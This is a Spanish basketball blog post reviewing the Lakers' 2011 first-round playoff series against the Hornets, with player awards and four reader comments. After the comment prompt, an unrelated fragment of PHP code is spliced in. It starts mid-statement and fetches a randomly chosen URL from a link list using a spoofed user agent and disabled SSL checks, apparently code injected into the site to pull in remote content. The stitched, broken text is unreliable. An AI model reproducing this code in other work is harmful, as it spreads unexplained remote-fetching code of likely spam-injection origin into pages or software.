Primera ronda del Oeste: Lakers 4 – Hornets 2

01 de May de 2011 por TheDeerHunter

¿Ha sonado ya el despertador para los Lakers? El susto ha sido como para que espabilen, porque las dudas que arrastran, lejos de disiparse, se habían extendido hasta incluso hacer temer el batacazo de los campeones en primera ronda. La foto de Kobe con muletas fue finalmente imagen de un contratiempo en lugar de una sentencia. El rendimiento de Gasol un problema pasajero, suponemos.

Con los Lakers nunca se sabe. Un día parece que nada funciona y la cosa no va con ellos y al siguiente apabullan al rival. No hay patrón establecido. Para desesperación de sus seguidores rara vez puede discernirse si se trata de una extraña broma Zen o falta de actitud e incapacidad.

Hemos asistido posiblemente a la peor serie conjunta que nadie haya presenciado de Kobe y Pau desde que están juntos, sobre todo del segundo. Por ciertos gestos algunos llegamos a vislumbrar algún problema latente entre ellos que sería definitivo para sus intereses. Posiblemente sólo se trata de simple paranoia, producto de nuestra imaginación ante la imprevisibilidad de “estas divas” o también algo circunstancial y pasajero. Pronto podremos verificarlo porque los Mavericks no son los Hornets. Al final ambos han cumplido y la serie se ha ganado. Pasa capítulo.

Curiosamente lo que antaño se consideró el gran talón de aquiles de los Lakers ha sacado las castañas del fuego. Bynum, Odom, Artest, los actores de reparto, han sido los verdaderos pilares del equipo para sacar adelante la serie. Fisher también ha aportado lo suyo, aunque más de uno se tire de los pelos ante tal afirmación. Siempre que un base rival destaca, automáticamente se mira a Fisher. Sospechoso habitual y crónico. Chris Paul es para algunos el mejor de todos y en esta serie así lo ha aparentado. CP3 lleva destrozando a sus pares desde que puso un pie en la NBA. Se pueden consultar innumerables ejemplos de destrozas a casi cualquier base de la liga, no sólo a Fisher. Cuando está inspirado es una maravilla verle y, además, muy pocos pueden pararlo. Fisher no, seguramente. Pero tampoco Blake, ni Shannon… Ni tampoco otros excelsos defensores de perímetro como el propio Kobe, Artest o Barnes Me atrevería a decir que probablemente ningún ser humano. Repartir 11.5 asistencias en ese equipo debe de ser algo así como el doble en otros mejor armados. De él hemos visto actuaciones antológicas como la del primera partido (33-14-7)  o la del cuarto (27-15-13). Para enseñar en las escuelas de baloncesto.

Después se ha comparado mucho esta serie con aquella que los Lakers tuvieron que llegar al 7º contra unos Rockets sin pívots, hace dos años. Tanto entonces como ahora es difícilmente digerible que un equipo tan inferior por dentro les gane el rebote. En aquel entonces Landry peleaba por Houston y ahora lo hace por New Orleans. Fue un quebradero de cabeza entonces y lo ha sido ahora. Le va muy bien el rival amarillo y ha sido una pesadilla para Gasol.

Ariza también fue de la partida en aquella serie pero en su caso a las órdenes de Phil Jackson. Por momentos ha recordado a aquel Ariza campeón. Ójala regule su producción a este nivel.

Por lo demás, poco más. Donde no hay no se puede sacar y los Hornets son un equipo muy cogido por los pelos. No se puede ganar a los Lakers, ni prácticamente a nadie, promediando 89 puntos por partido. Quizás con West otro gallo hubiera cantado. Al menos se van de vacaciones con la cabeza alta.

PREMIOS

MVP: Andrew Bynum ha hecho la serie de su vida con 15 puntos, 10 rebotes y casi 2 tapones. Lamar Odom, 12 puntos, 6 rebotes y 2 asistencias. Los días que ellos han logrado imponerse, los Lakers han ganado con comodidad.

Sorpresa: Carl Landry ha logrado superar a Pau Gasol varias noches. Sufre reboteando y ya conocíamos su calidad ofensiva pero eso no impide que nos siga alucinando lo que consigue con tan poco.

Decepción: Repartida. Emeka Okafor fue elegido por delante de Dwight Howard. Su desempeño ya lo hemos visto, incapaz de producir ni un 8-6. Se trata de un correcto defensor a lo sumo y parece que esto es lo más que van a sacar de él. Por su parte, Pau Gasol ha pasado de promediar 19-10-3 en la regular a 13’5-6-4 ahora. No queremos ni recordar los dos primeros partidos. ¿Quo Hoc Pau?

Esfuerzo en vano: Tenemos mono de seguir viendo a Chris Paul disputar series de playoffs. Aquí hemos visto al verdadero CP3. Esperemos que el más que posible cambio de camiseta aumente la frecuencia de sus participaciones en postemporada y de sus partidos sublimes.

Comenta

4 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Gran análisis Deer.

    Y me doy por aludido (como muchos otros) del dardo envenenado por lo de Fischer jejeje. En ataque ha estado muy sobrio, toda la razón y en defensa como los demás. Entono el mea culpa.

      Citar

  2. Len Bias dice:
    #2

    De acuerdo en casi todo, especialmente en lo de que CP3 es el mejor base de la liga.

    Los Lakers ya veremos hasta donde llegan, son capaces de caer ante Mavericks o de ganar la NBA, quién sabe.

    Una cosa Deer, a qué te refieres con que Okafor fue elegido por delante de Howard? A que los Hornets decidieran ficharle a él antes que a Dwight?
    Howard fue número 1 del draft si te refieres a eso, así que Okafor en lo único que le ha ganado a Howard fue en el Rookie of the Year.

      Citar

  3. TheDeerHunter dice:
    #3

    Lapsus mental, Len… a eso exáctamente que dices tú me refería.

      Citar

  4. Denise dice:
    #4

    Okafor es un pedazo de bluff lo mires por donde lo mires. Con ese físico y jugando al lado de Paul debería hacer como minimo un 14-10 con la gorra. Una estafa en toda regla este Okafor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>